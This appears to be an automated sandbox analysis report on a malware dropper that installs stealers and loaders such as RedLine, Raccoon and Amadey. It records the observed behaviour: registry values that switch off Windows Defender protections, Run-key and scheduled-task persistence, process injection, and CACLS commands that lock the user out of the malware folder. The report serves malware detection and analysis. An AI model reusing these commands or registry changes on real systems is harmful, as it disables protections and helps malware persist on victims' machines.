Analysis Overview
SHA256
359b38c384b3b2140bf73ac6038e1e19b09e8a8d602d19778cf7973b3c052a61
Threat Level: Known bad
The file file.exe was found to be: Known bad.
Malicious Activity Summary
ZGRat
Amadey
Glupteba payload
SectopRAT
SectopRAT payload
RedLine
Raccoon
RedLine payload
Raccoon Stealer payload
Modifies Windows Defender Real-time Protection settings
Detect ZGRat V1
Glupteba
SmokeLoader
DcRat
Downloads MZ/PE file
Stops running service(s)
Modifies Windows Firewall
Windows security modification
Loads dropped DLL
Executes dropped EXE
UPX packed file
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Adds Run key to start application
Suspicious use of SetThreadContext
Detected potential entity reuse from brand paypal.
Launches sc.exe
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Modifies registry key
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Enumerates system info in registry
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-31 05:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-31 05:28
Reported
2023-10-31 05:30
Platform
win10v2004-20231023-en
Max time kernel
36s
Max time network
152s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5mj1gQ4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\958.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\958.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WW1Gm42.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\HG0CX5rO.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tK3WZ13.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fh5vZ94.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ei4jY79.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\FW5WP06.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\1FF.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3752 set thread context of 1560 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ly57yE6.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4992 set thread context of 1088 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ki6802.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 2380 set thread context of 228 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4je116wc.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4720 set thread context of 6224 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1XI48lH3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tK3WZ13.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tK3WZ13.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fh5vZ94.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fh5vZ94.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WW1Gm42.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WW1Gm42.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ei4jY79.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ei4jY79.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\FW5WP06.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\FW5WP06.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ly57yE6.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ly57yE6.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ki6802.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ki6802.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1088 -ip 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 540
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4je116wc.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4je116wc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5mj1gQ4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5mj1gQ4.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6vY7PH5.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6vY7PH5.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wg2VJ36.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wg2VJ36.exe
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BA09.tmp\BA0A.tmp\BA0B.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wg2VJ36.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,7093548274571292969,13048696657077383211,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,7093548274571292969,13048696657077383211,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
